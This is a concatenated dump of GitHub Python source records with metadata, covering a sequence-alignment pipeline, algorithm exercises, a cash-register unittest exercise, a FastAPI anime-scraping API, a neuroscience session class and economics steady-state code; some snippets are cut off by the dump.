fastas,\n cpu_number,\n logger,\n temporary_folder,\n min_align_length=cfg[\"min_align_len\"],\n tqdm_desc=\"Parsing xmls\",\n )\n os.chdir(temporary_folder)\n dat_files = [x for x in os.listdir(os.getcwd()) if \".dat\" in x]\n taxa_pairs = primaryScript.find_dat_pairs(dat_files)\n common_hits = shelve.open(\"common_hits_dict\")\n for pair in taxa_pairs:\n primaryScript.populate_shelve(common_hits, pair)\n common_hits.close()\n logger.info(\"Done parsing xmls\")\n\n\ndef componentsSequential(cfg, logger, temporary_folder):\n logger.info(\"Building components sequentially\")\n os.chdir(temporary_folder)\n check_for_file(\"common_hits_dict.dat\")\n primaryScript.getComponentsSequential(cfg, logger)\n # ===================================================================================\n for shl in glob.glob(\"common_hits_dict.*\"):\n os.remove(shl)\n # ===================================================================================\n logger.info(\"Done with computing components\")\n\n\ndef componentsParallel(cfg, logger, cpu_number, temporary_folder):\n logger.info(\"Building components in parallel\")\n os.chdir(temporary_folder)\n check_for_file(\"common_hits_dict.dat\")\n primaryScript.getComponentsParallel(cfg, logger, cpu_number)\n # ===================================================================================\n for shl in glob.glob(\"common_hits_dict.*\"):\n os.remove(shl)\n # ===================================================================================\n logger.info(\"Done with computing components\")\n\n\ndef makePrimaryAssortments(cfg, logger, temporary_folder):\n logger.info(\"Retrieving the primary sequence assortments\")\n out_folder = cfg[\"output_folder\"]\n create_result_folder(out_folder, logger)\n discard_aligns = cfg[\"discarded_groups_folder\"]\n create_result_folder(discard_aligns, logger)\n primaryScript.mk_primary(cfg, logger, temporary_folder)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"yjk-bertrand/AligerA","sub_path":"aligera_scripts/AligerA_primary.py","file_name":"AligerA_primary.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21692220098","text":"n = 
int(input())\n\n# find all primes up to n with a sieve of Eratosthenes\nprime = []\nsieve = [True]*(n+1)\nsieve[0] = sieve[1] = False\nfor i in range(2, int(n**0.5)+1):\n    if not sieve[i]: continue\n    for j in range(i*i, n+1, i):\n        sieve[j] = False\nfor i in range(n+1):\n    if sieve[i]:\n        prime.append(i)\n\n# count consecutive sums equal to n with two pointers\nanswer = 0\nif n > 1:\n    end = 0\n    total = prime[0]\n    for start in range(len(prime)):\n        while end < len(prime) and total < n:\n            end += 1\n            if end != len(prime): total += prime[end]\n        if end == len(prime): break\n        if total == n: answer += 1\n        total -= prime[start]\nprint(answer)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/12.투포인터/1644-소수의 연속합/1644.py","file_name":"1644.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
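The record above pairs a sieve of Eratosthenes with a two-pointer window over the resulting primes. A minimal self-contained sketch of the same technique, with illustrative names that are not part of the original solution:

def count_consecutive_prime_sums(n):
    if n < 2:
        return 0
    # sieve of Eratosthenes up to n
    sieve = [True] * (n + 1)
    sieve[0] = sieve[1] = False
    for i in range(2, int(n ** 0.5) + 1):
        if sieve[i]:
            for j in range(i * i, n + 1, i):
                sieve[j] = False
    primes = [i for i in range(n + 1) if sieve[i]]
    # slide a window over the primes, growing the right end while the sum falls short
    count = total = hi = 0
    for lo in range(len(primes)):
        while hi < len(primes) and total < n:
            total += primes[hi]
            hi += 1
        if total == n:
            count += 1
        total -= primes[lo]
    return count

assert count_consecutive_prime_sums(41) == 3  # 2+3+5+7+11+13, 11+13+17, and 41 itself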
{"seq_id":"5539345767","text":"\"\"\"program a cash register for a warehouse.\r\n    The system must be able to scan a product (the cashier can type in the product code), \r\n    and add it to the list of products purchased for that customer.\r\n    It should also show the subtotal. The cashier can finish the purchase whenever\r\n    he wishes and the system must apply the corresponding discounts to the products.\r\n    Then, the cashier indicates how much the customer pays with and the system must \r\n    show the change to be returned to the customer. Build the models and \r\n    tests of the functionalities. It is not necessary to make a graphical interface\r\n    (or console), but the whole operation can be validated with the unit tests.\"\"\"\r\n\r\n#we will use class CashRegister from cash_register.py and class RetailItem from retail.py \r\n#main to test the program\r\n\r\nimport unittest\r\nclass CashRegister:\r\n# initialize an empty list to hold purchased items\r\n    def __init__(self):\r\n        self.__items = []\r\n# method that clears the contents of the cash register\r\n    def clear(self):\r\n        self.__items = []\r\n# method that simulates adding an item to the cash register.\r\n# receives a RetailItem object as an argument.\r\n    def purchase_item(self, retail_item):\r\n        self.__items.append(retail_item)\r\n        print(\"The item was added to the cash register.\")\r\n# method returning the total cost of items at the cash register.\r\n    def get_total(self):\r\n        total = 0.0\r\n        for item in self.__items:\r\n            total = total + item.get_price()\r\n        return total\r\n# method that prints a list of items at the cash register.\r\n    def show_items(self):\r\n        print(\"The items in the cash register are:\")\r\n        print()\r\n        for item in self.__items:\r\n            print(item)\r\n        print()\r\n\r\n#=============================================================== \r\n#******* TESTING CASH REGISTER *******\r\n#===============================================================\r\n\r\nclass Test(unittest.TestCase):\r\n    #@unittest.skip(\"Reason for skipping\")#Unconditionally skip the decorated test. reason should describe why the test is being skipped.\r\n    \r\n    #assertTrue compares the test value with True\r\n    #create a method to check if the parameter retail_item is empty\r\n    def is_empty(retail_item):\r\n        if(len(retail_item) == 0):\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    #assertTrue asserts that the result is True\r\n    def test_is_empty_empty_string_success(self):\r\n        result = Test.is_empty(\"\")\r\n        self.assertTrue(result, True)\r\n\r\n    #assertFalse compares the test value with False\r\n    def test_is_empty_with_string_success(self):\r\n        result = Test.is_empty(\"retail_item\")\r\n        self.assertFalse(result, False)\r\n\r\n\r\nimport unittest\r\n#test cases are represented by unittest.TestCase instances.\r\nclass RetailItem:\r\n    def __init__(self, description, inventory, price):\r\n        self.__description = description\r\n        self.__inventory = inventory\r\n        self.__price = price\r\n    \r\n    def set_description(self, description):\r\n        self.__description = description\r\n    \r\n    #inventory level\r\n    def set_inventory(self, inventory):\r\n        self.__inventory = inventory\r\n    \r\n    #put the price\r\n    def set_price(self, price):\r\n        self.__price = price\r\n    \r\n    #get the item description\r\n    def get_description(self):\r\n        return self.__description\r\n    \r\n    #check for inventory\r\n    def get_inventory(self):\r\n        return self.__inventory\r\n    \r\n    #get the item price\r\n    def get_price(self):\r\n        return self.__price\r\n    \r\n    def __str__(self):\r\n        result = 'Description: ' + self.get_description() + '\\n' + \\\r\n                 'Units in inventory: ' + str(self.get_inventory()) + \\\r\n                 '\\nPrice: $' + str(self.get_price())\r\n        return result\r\n\r\n#=========================================================\r\n#*******TESTING RETAIL ITEMS ********\r\n#=========================================================\r\n\r\nclass Test(unittest.TestCase):\r\n    #@unittest.skip(\"Reason for skipping\")#Unconditionally skip the decorated test. 
reason should describe why the test is being skipped.\r\n    \r\n    \r\n#********description method********\r\n    #assertTrue compares the test value with True\r\n    #create a method to check if the parameter description is empty\r\n    def is_empty(description):\r\n        if(len(description) == 0):\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    #assertTrue asserts that the result is True\r\n    def test_is_empty_empty_string_success(self):\r\n        result = Test.is_empty(\"\")\r\n        self.assertTrue(result, True)\r\n\r\n    #assertFalse compares the test value with False\r\n    def test_is_empty_with_string_success(self):\r\n        result = Test.is_empty(\"description\")\r\n        self.assertFalse(result, False)\r\n\r\n\r\n#********inventory method********\r\n\r\n#assertTrue compares the test value with True\r\n    #create a method to check if the parameter inventory is empty\r\n    def is_empty(inventory):\r\n        if(len(inventory) == 0):\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    #assertTrue asserts that the result is True\r\n    def test_is_empty_empty_string_success(self):\r\n        result = Test.is_empty(\"\")\r\n        self.assertTrue(result, True)\r\n\r\n    #assertFalse compares the test value with False\r\n    def test_is_empty_with_string_success(self):\r\n        result = Test.is_empty(\"inventory\")\r\n        self.assertFalse(result, False)\r\n\r\n#********price method********\r\n\r\n#write unittest to test the functionality\r\n    #helper returning the discount amount for a price and a rate\r\n    def price(amount, rate):\r\n        return round(amount * rate, 3)\r\n\r\n    #assertEqual check for expected result\r\n    def test_number_division_success(self):\r\n        result = Test.price(19.99, .1)\r\n        self.assertEqual(result, 1.999) #1.999 is the expected result\r\n\r\n#import retail and cash_register classes\r\n#==============================================\r\n#********MAIN TO TEST THE PROGRAM*********\r\n#==============================================\r\n\r\nimport retail\r\nimport cash_register\r\n\r\n# constants to hold the options of purchase items\r\nITEM1 = 1\r\nITEM2 = 2\r\nITEM3 = 3\r\nITEM4 = 4\r\nITEM5 = 5\r\n\r\ndef main():\r\n#create sale items\r\n    Item1 = retail.RetailItem(\"Item1\", 10, (19.99 - (19.99 *.1) )) #10 percent discount\r\n    Item2 = retail.RetailItem(\"Item2\", 15, 12.50) # no discount\r\n    Item3 = retail.RetailItem(\"Item3\", 3, 79.00 - (79.00 * 0.15 )) #15% discount\r\n    Item4 = retail.RetailItem(\"Item4\", 50, 1.00) #no discount\r\n    Item5 = retail.RetailItem(\"Item5\", 5, 49.99 - (49.99 * 0.1)) #10% discount\r\n\r\n# create dictionary of sale items\r\n    sale_items = {ITEM1:Item1, ITEM2:Item2, ITEM3:Item3, ITEM4:Item4, ITEM5:Item5}\r\n\r\n# create a cash register\r\n    register = cash_register.CashRegister()\r\n\r\n# initialize loop test\r\n    checkout = 'N'\r\n\r\n# user wants to purchase more items\r\n    while checkout=='N':\r\n        user_choice = get_user_choice()\r\n        item = sale_items[user_choice]\r\n        if item.get_inventory() == 0:\r\n            print(\"The item is out of stock.\")\r\n        else:\r\n            register.purchase_item(item)\r\n# update item\r\n            new_item = retail.RetailItem(item.get_description(), item.get_inventory()-1,\\\r\n                                         item.get_price())\r\n\r\n            sale_items[user_choice] = new_item\r\n        checkout = input(\"Are you ready to check out (Y/N)? \")\r\n        print()\r\n    print(\"Your purchase total is: \", format(register.get_total(), '.2f'))\r\n    print()\r\n    register.show_items()\r\n    register.clear()\r\n\r\ndef get_user_choice():\r\n    print(\"Menu\")\r\n    print(\"---------------------------------\")\r\n    print(\"1. Item1\")\r\n    print(\"2. Item2\")\r\n    print(\"3. Item3\")\r\n    print(\"4. Item4\")\r\n    print(\"5. Item5\")\r\n    print()\r\n    \r\n    choice = int(input(\"Enter the menu number of the item \" +\\\r\n                       \"you would like to purchase: \"))\r\n    print()\r\n    while choice > ITEM5 or choice < ITEM1:\r\n        choice = int(input(\"Please enter a valid item number: \"))\r\n        print()\r\n    return choice\r\nmain()\r\n\r\n","repo_name":"feliusps/Python","sub_path":"python programming Austral University-Coursera/Object Oriente Programming in Python/week 4 inittest testing TDD OOP/caja_registradora.py","file_name":"caja_registradora.py","file_ext":"py","file_size_in_byte":8060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
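The test classes in the record above interleave production classes and assertions; written with plain unittest conventions, the same checks come out as below (function and class names here are illustrative, not from the original exercise):

import unittest

def is_empty(value):
    return len(value) == 0

def discount_amount(price, rate):
    # discount on a price, rounded to three decimals
    return round(price * rate, 3)

class RegisterTests(unittest.TestCase):
    def test_is_empty_with_empty_string(self):
        self.assertTrue(is_empty(""))

    def test_is_empty_with_text(self):
        self.assertFalse(is_empty("retail_item"))

    def test_discount_amount(self):
        # 10% of a 19.99 item is 1.999; assertAlmostEqual is float-safe
        self.assertAlmostEqual(discount_amount(19.99, 0.1), 1.999)

if __name__ == '__main__':
    unittest.main()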
Item5\")\r\n print()\r\n \r\n choice = int(input(\"Enter the menu number of the item \" +\\\r\n \"you would like to purchase: \"))\r\n print()\r\n while choice > ITEM5 or choice < ITEM1:\r\n choice = int(input(\"Please enter a valid item number: \"))\r\n print()\r\n return choice\r\nmain()\r\n\r\n","repo_name":"feliusps/Python","sub_path":"python programming Austral University-Coursera/Object Oriente Programming in Python/week 4 inittest testing TDD OOP/caja_registradora.py","file_name":"caja_registradora.py","file_ext":"py","file_size_in_byte":8060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38127442219","text":"import time\nimport random\n\ndef log_time(function):\n def wrapper(*args):\n t0=time.time()\n function(*args)\n t=time.time()-t0\n print(function.__name__ + \": \" + str(t))\n return wrapper\n\n@log_time\ndef random_sort(n):\n return sorted([random.random() for i in range(n)])\n\n@log_time\ndef count(start,stop):\n i=start\n while i n:\n high = mid - 1\n elif lst[mid] < n:\n low = mid + 1\n else:\n return mid\n return -1\n","repo_name":"luoyan988/problem","sub_path":"ebook/code/python/chapter25.py","file_name":"chapter25.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4315441490","text":"# ~ Computational Geometry - (2020) ~\n# \n# * Topic: Given two points inside a polygon, the goal is to find \n# the shortest path lying inside the polygon between the \n# two points. *\n# \n# * Author's Name : Ioannis Marios Papagiannakos\n# \n\nimport os\n\nfrom project_libs import findShortestPathInPolygon, point\n\n# Main \n\nprojectDir = os.path.dirname(__file__)\ninputDataDir = os.path.join('Data','in')\noutputDataDir = os.path.join('Data', 'out')\noutputFileName = ['LayerOfInterest.shp', 'MonotonizedLayer.shp', 'TriangulatedLayer.shp', 'Path.shp', 'ShortestPath.shp']\n\n# Open first shapefile\ninputFileName = os.path.join('GSHHS_shp', 'c', 'GSHHS_c_L1.shp')\n# takes time...!\n# inputFileName = os.path.join('GSHHS_shp', 'f', 'GSHHS_f_L1.shp')\ninputFileName = os.path.join(projectDir, inputDataDir, inputFileName)\n\n# Shapefile format\ndriverName = \"ESRI Shapefile\"\n\n# Input Format\n# point1 = point(, )\n\n# Madagascar\ninput_starting_point = point(49.162, -12.424)\ninput_ending_point = point(44.706, -16.295)\n\n# # Indonesia\n# input_starting_point = point(119.978, -5.539)\n# input_ending_point = point(124.534, 1.002)\n\n# # Nunavut (Canada)\n# input_starting_point = point(-77.10, 65.16)\n# input_ending_point = point(-87.999, 70.381)\n\nfindShortestPathInPolygon(input_starting_point, input_ending_point,\n inputFileName, outputFileName, driverName, outputDataDir)\n\n","repo_name":"JohnPapagiannakos/shortestpathsinpolygons","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42231190553","text":"\"\"\"A nelpy session is roughly equivalent to a NEO segment.\nIt has a common clock.\n\nThis object is very much a work-in-progress!!!\"\"\"\n\n__all__ = ['Session']\n\nimport copy\nimport warnings\n\n# Force warnings.warn() to omit the source code line in the message\nformatwarning_orig = warnings.formatwarning\nwarnings.formatwarning = lambda message, category, filename, lineno, \\\n line=None: formatwarning_orig(\n message, category, filename, lineno, 
{"seq_id":"42231190553","text":"\"\"\"A nelpy session is roughly equivalent to a NEO segment.\nIt has a common clock.\n\nThis object is very much a work-in-progress!!!\"\"\"\n\n__all__ = ['Session']\n\nimport copy\nimport warnings\n\n# Force warnings.warn() to omit the source code line in the message\nformatwarning_orig = warnings.formatwarning\nwarnings.formatwarning = lambda message, category, filename, lineno, \\\n    line=None: formatwarning_orig(\n        message, category, filename, lineno, line='')\n\n########################################################################\n# class Session\n########################################################################\nclass Session:\n    \"\"\"Nelpy session with common clock.\"\"\"\n\n    __attributes__ = [\"_animal\", \"_label\", \"_st\", \"_extern\", \"_mua\"]\n\n    def __init__(self, animal=None, st=None, extern=None, mua=None, label=None, empty=False):\n\n        # if an empty object is requested, return it:\n        if empty:\n            for attr in self.__attributes__:\n                setattr(self, attr, None)\n            return\n\n        self._animal = animal\n        self._extern = extern\n        self._st = st\n        self._mua = mua\n        self.label = label\n\n    @property\n    def animal(self):\n        return self._animal\n\n    @property\n    def extern(self):\n        return self._extern\n\n    @property\n    def st(self):\n        return self._st\n\n    @property\n    def mua(self):\n        return self._mua\n\n    @property\n    def label(self):\n        \"\"\"Label pertaining to the source of the spike train.\"\"\"\n        if self._label is None:\n            warnings.warn(\"label has not yet been specified\")\n        return self._label\n\n    @label.setter\n    def label(self, val):\n        if val is not None:\n            try: # cast to str:\n                label = str(val)\n            except TypeError:\n                raise TypeError(\"cannot convert label to string\")\n        else:\n            label = val\n        self._label = label\n\n#----------------------------------------------------------------------#\n#======================================================================#","repo_name":"nelpy/nelpy","sub_path":"nelpy/auxiliary/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"41359845688","text":"from util import http, hook\n\n@hook.command(autohelp=False)\ndef bitcoin(inp, say=None):\n    \".bitcoin -- gets current exchange rate for bitcoins from mtgox\"\n    data = http.get_json(\"https://data.mtgox.com//api//2//BTCUSD//money//ticker\")\n    ticker = data['data']\n    t = {\n        'low': float(ticker['low']['value']),\n        'high': float(ticker['high']['value']),\n        'avg': float(ticker['last']['value']),\n        'vol': float(ticker['vol']['value'])\n    }\n    say(\"Current: \\x0307$%(avg).2f\\x0f - High: \\x0307$%(high).2f\\x0f\"\n        \" - Low: \\x0307$%(low).2f\\x0f - Volume: %(vol)s\" % t)\n","repo_name":"hitzler/homero","sub_path":"plugins/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"}
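The bitcoin plugin above relies on printf-style formatting with mapping keys, a single % substitution driven by a dict. A standalone illustration of that technique with made-up numbers:

t = {'low': 91.5, 'high': 99.25, 'avg': 95.1, 'vol': 12345}
line = ('Current: $%(avg).2f - High: $%(high).2f'
        ' - Low: $%(low).2f - Volume: %(vol)s' % t)
assert line == 'Current: $95.10 - High: $99.25 - Low: $91.50 - Volume: 12345'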
{"seq_id":"12275751300","text":"\"\"\"\nDesign and implement a data structure for a compressed string iterator.\nIt should support the following operations: next and hasNext.\n\nThe given compressed string will be in the form of each letter followed by\na positive integer representing the number of this letter existing in the original uncompressed string.\n\nnext() - if the original string still has uncompressed characters, return the next letter;\n         Otherwise return a white space.\nhasNext() - Judge whether there is any letter that still needs to be uncompressed.\n\nExample:\n\nStringIterator iterator = new StringIterator(\"L1e2t1C1o1d1e1\");\n\niterator.next(); // return 'L'\niterator.next(); // return 'e'\niterator.next(); // return 'e'\niterator.next(); // return 't'\niterator.next(); // return 'C'\niterator.next(); // return 'o'\niterator.next(); // return 'd'\niterator.hasNext(); // return true\niterator.next(); // return 'e'\niterator.hasNext(); // return false\niterator.next(); // return ' '\n\"\"\"\nclass StringIterator:\n\n    def __init__(self, compressedString):\n        \"\"\"\n        :type compressedString: str\n        \"\"\"\n        self.s = compressedString\n        self.idx = 0\n        self.c = \"\"\n        self.count = 0\n        self.hasNext()\n\n    def next(self):\n        \"\"\"\n        :rtype: str\n        \"\"\"\n        #print(self.c, self.count)\n        if self.count==0:\n            if not self.hasNext():\n                return \" \"\n        self.count -= 1\n        return self.c\n\n    def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        if self.count>0:\n            return True\n        if self.idx>=len(self.s):\n            self.count = 0\n            return False\n        self.c = self.s[self.idx]\n        self.idx += 1\n        start = self.idx\n        while self.idx<len(self.s) and self.s[self.idx].isdigit():\n            self.idx += 1\n        self.count = int(self.s[start:self.idx])\n        return self.count>0\n\n# Your StringIterator object will be instantiated and called as such:\n# obj = StringIterator(compressedString)\n# param_1 = obj.next()\n# param_2 = obj.hasNext()\n","repo_name":"ellinx/LC-python","sub_path":"DesignCompressedStringIterator.py","file_name":"DesignCompressedStringIterator.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
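Assuming the StringIterator class above is in scope, its behaviour on the docstring's own example can be checked directly:

it = StringIterator('L1e2t1C1o1d1e1')
assert ''.join(it.next() for _ in range(8)) == 'LeetCode'
assert it.hasNext() is False
assert it.next() == ' '  # an exhausted iterator yields a space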
{"seq_id":"20167086946","text":"import uvicorn\r\nfrom gogoanime import *\r\nfrom fastapi import FastAPI\r\nimport json\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\n\r\n\r\napp = FastAPI()\r\n\r\norigins = [\"*\"]\r\n\r\napp.add_middleware(\r\n    CORSMiddleware,\r\n    allow_origins=origins,\r\n    allow_credentials=True,\r\n    allow_methods=[\"*\"],\r\n    allow_headers=[\"*\"],\r\n)\r\n\r\n\r\n\r\n@app.get('/api/recently/{page}')\r\nasync def recently(page: int):\r\n    recently = GogoanimeParser.get_recently_uploaded(page=page)\r\n    return json.loads(recently)\r\n\r\n@app.get('/api/latest/{page}')\r\nasync def latest(page: int):\r\n    latest = GogoanimeParser.latest(page=page)\r\n    return json.loads(latest)\r\n\r\n\r\n@app.get('/api/popular/{page}')\r\nasync def popular(page: int):\r\n    popular = GogoanimeParser.popular(page=page)\r\n    return json.loads(popular)\r\n\r\n@app.get('/api/new-season/{page}')\r\nasync def newseason(page: int):\r\n    newseason = GogoanimeParser.newSeason(page=page)\r\n    return json.loads(newseason)\r\n\r\n@app.get('/api/movies/{page}')\r\nasync def movies(page: int):\r\n    movies = GogoanimeParser.movies(page=page)\r\n    return json.loads(movies)\r\n\r\n@app.get('/api/search/{key}/{page}')\r\nasync def search(key: str ,page: int):\r\n    search = GogoanimeParser.search(key=key,page=page)\r\n    return search\r\n\r\n\r\n@app.get('/api/category/{genre}/{page}')\r\nasync def genre(genre: str, page: int):\r\n    genre = GogoanimeParser.genre(genre_name=genre, page=page)\r\n    return genre\r\n\r\n\r\n@app.get('/api/details/{animeid}')\r\nasync def details(animeid: str):\r\n    detail = GogoanimeParser.details(animeid=animeid)\r\n    return detail\r\n\r\n@app.get('/api/schedule/{animeid}')\r\nasync def schedule(animeid: str):\r\n    schedule = GogoanimeParser.schedule(animeid=animeid)\r\n    return schedule\r\n\r\n\r\n@app.get('/api/{animeid}/episode/{episode_num}')\r\nasync def episode(animeid: str, episode_num: int):\r\n    episode = GogoanimeParser.episode(animeid=animeid, episode_num=episode_num)\r\n    return episode\r\n\r\n\r\n@app.get(\"/\")\r\ndef main():\r\n    return {\r\n        \"message\": \"Hello my friend\"\r\n    }\r\n    \r\nif __name__ == \"__main__\":\r\n    uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\r\n","repo_name":"ottoh3x/ottogo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9879450880","text":"import math\r\na = 2\r\nb = math.sqrt(2)\r\nc = 0\r\nwhile c!=1:\r\n    c= 2/b\r\n    a= a*c\r\n    b= math.sqrt(2+b)\r\n    \r\nprint(\"Approximation of pi:\",round(a,3))\r\nr=float(input(\"Enter the radius:\\n\"))\r\nArea= round(a*r**2, 3)\r\nprint(\"Area:\",Area)\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/gwxyon001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33025803354","text":"import yaml\n\ndef load_yaml_from_file(path):\n    with open(path, 'r') as stream:\n        data = yaml.safe_load(stream)\n    return data\n\ndef multiline_equal(s1, s2):\n    s1 = s1.strip()\n    s2 = s2.strip()\n    s1_array = s1.splitlines()\n    s2_array = s2.splitlines()\n    if len(s1_array) != len(s2_array):\n        return False\n    for i in range(len(s1_array)):\n        if s1_array[i].strip() != s2_array[i].strip():\n            return False\n    return True","repo_name":"diogenes0803/simple-server-configuration","sub_path":"commons/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25524445215","text":"#!/usr/bin/env python3\nimport os\nfrom pathlib import Path\nimport sys\n\n__projectdir__ = Path(os.path.dirname(os.path.realpath(__file__)) + '/')\n\nimport numpy as np\n\n# Get Steady State:{{{1\ndef getss(BETA, LAMBDAs, Pistar, SIGMA, TAU, WEIGHTs):\n    \"\"\"\n    Compute the steady state for a multiple sector model.\n\n    SIGMA = elasticity of substitution within sectors, TAU = across sectors\n    \"\"\"\n\n    J = len(WEIGHTs)\n\n    # verify WEIGHTs sum to 1\n    if np.abs(np.sum(WEIGHTs) - 1) > 1e-6:\n        raise ValueError('WEIGHTs must sum to 1.')\n\n    # compute PjstaroverPj\n    PjstaroverPj_list = []\n    for j in range(J):\n        PjstaroverPj_list.append( ( (1-(1-LAMBDAs[j])*Pistar**(SIGMA-1)) / LAMBDAs[j])**(1/(1-SIGMA)) )\n\n    PstaroverP = ((1 - (1 - LAMBDAs[j]) * Pistar**(SIGMA - 1))/LAMBDAs[j])**(1/(1 - SIGMA))\n\n    # compute nu_j\n    NUj_list = []\n    for j in range(J):\n        NUj_list.append( 1/(1 - (1-LAMBDAs[j])*Pistar**SIGMA) * LAMBDAs[j] * PjstaroverPj_list[j]**(-SIGMA) )\n\n    # compute MC\n    # first compute the sum of the integral term raised to (1 - TAU)\n    sumterm = 0\n    terminfoc_list = []\n    for j in range(J):\n        terminfoc_part1 = SIGMA / (SIGMA - 1) * (1 - (1-LAMBDAs[j])*BETA*Pistar**(SIGMA-1)) / ( 1 - (1-LAMBDAs[j]) * BETA * Pistar**SIGMA )\n        terminfoc_part2 = 1 / PjstaroverPj_list[j] \n        terminfoc = terminfoc_part1 * terminfoc_part2\n        terminfoc_list.append(terminfoc)\n        if terminfoc < 0:\n            raise ValueError('Solving for MC failed in Calvo multisector. terminfoc < 0.')\n\n        sumterm = sumterm + WEIGHTs[j] * (terminfoc_list[j]) ** (1 - TAU)\n    if sumterm <= 0:\n        raise ValueError('Solving for MC failed in Calvo multisector. 
sumterm < 0')\n MC = (1/sumterm)**(1/(1-TAU))\n\n # PjoverP_list\n PjoverP_list = []\n for j in range(J):\n PjoverP_list.append( terminfoc_list[j] * MC )\n\n # NU\n NU = 0\n for j in range(J):\n NU = NU + WEIGHTs[j] * PjoverP_list[j] ** (-TAU) * NUj_list[j]\n\n retdict = {}\n retdict['NUj_list'] = NUj_list\n retdict['PjstaroverPj_list'] = PjstaroverPj_list\n retdict['MC'] = MC\n retdict['PjoverP_list'] = PjoverP_list\n retdict['NU'] = NU\n\n if np.any([NU_j < 0 for NU_j in retdict['NUj_list']]):\n raise ValueError('NU_j take negative values.')\n\n return(retdict)\n\n\ndef test():\n LAMBDAs = [1 - (1 - 0.6) ** (1/4)]\n # LAMBDAs = [1 - (1 - 0.6) ** (1/4), 0.9]\n\n WEIGHTs = [1]\n\n retdict = getss(BETA = 0.94 ** (1/4), LAMBDAs = LAMBDAs, Pistar = 1.04 ** (1/4), SIGMA = 8, TAU = 1.001, WEIGHTs = WEIGHTs)\n print(retdict['MC'])\n print(retdict['PjoverP_list'])\n print(retdict['NUj_list'])\n print(retdict['NU'] * retdict['MC'])\n\n\ndef test2():\n LAMBDAs = [1 - (1 - 0.6) ** (1/4)] * 2\n # LAMBDAs = [1 - (1 - 0.6) ** (1/4), 0.9]\n\n WEIGHTs = [0.5, 0.5]\n\n retdict = getss(BETA = 0.94 ** (1/4), LAMBDAs = LAMBDAs, Pistar = 1.04 ** (1/4), SIGMA = 8, TAU = 1.001, WEIGHTs = WEIGHTs)\n print(retdict['MC'])\n print(retdict['PjoverP_list'])\n print(retdict['NUj_list'])\n print(retdict['NU'] * retdict['MC'])\n\n\n# Pricing Parameters Based upon Nakamura Steinsson 2008:{{{1\ndef ns_vectors(numsectors = 14):\n \"\"\"\n Vectors for weights and lambdas from \n \"\"\"\n if numsectors == 6:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 19.1, 5.9, 13.7, 38.5, 15.1])\n ns_monthlyfreqs = np.array([91.6, 35.5, 25.4, 11.9, 8.8, 5.2])\n elif numsectors == 9:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 19.1, 5.9, 9.2, 13.7, 9.6, 10.0, 15.1, 9.7])\n ns_monthlyfreqs = np.array([91.6, 35.5, 25.4, 19.7, 11.9, 7.6, 5.5, 5.2, 3.2])\n elif numsectors == 11:\n # weights from Table 2, p.1433 of Nakamura Steinsson's Five Facts About Prices, 2008\n ns_weights = np.array([8.2, 5.9, 5.0, 6.5, 8.3, 3.6, 5.4, 5.3, 5.1, 5.5, 38.5])\n ns_monthlyfreqs = np.array([10.5, 25.0, 6.0, 3.6, 31.3, 6.0, 15.0, 38.1, 87.6, 41.7, 6.1])\n elif numsectors == 14:\n # Table 2, p.978 2010 multisector menu cost\n ns_weights = np.array([7.7, 5.3, 5.5, 5.9, 8.3, 7.7, 13.7, 7.5, 5.0, 7.8, 3.6, 7.6, 6.5, 7.9])\n ns_monthlyfreqs = np.array([91.6, 49.4, 43.7, 25.4, 21.3, 21.7, 11.9, 8.4, 6.5, 6.2, 6.1, 4.9, 3.6, 2.9])\n else:\n raise ValueError('Incorrect option for sectors.')\n\n # adjustments\n ns_weights = ns_weights / np.sum(ns_weights)\n ns_monthlyfreqs = ns_monthlyfreqs / 100\n\n return(ns_weights, ns_monthlyfreqs)\n\n\ndef getns_lambdas(monthsinperiod = 3, numsectors = 14):\n ns_weights, ns_monthlyfreqs = ns_vectors(numsectors = numsectors)\n ns_lambdas = 1 - (1 - ns_monthlyfreqs) ** monthsinperiod\n return(ns_weights, ns_lambdas)\n\n\ndef ns_ss(BETA, Pistar, SIGMA, TAU, monthsinperiod = 1):\n \"\"\"\n Frequencies of price changes and weights taken from Nakamura Steinsson\n \"\"\"\n ns_weights, ns_lambdas = getns_lambdas(monthsinperiod = monthsinperiod)\n\n retdict = getss(BETA, ns_lambdas, Pistar, SIGMA, TAU, 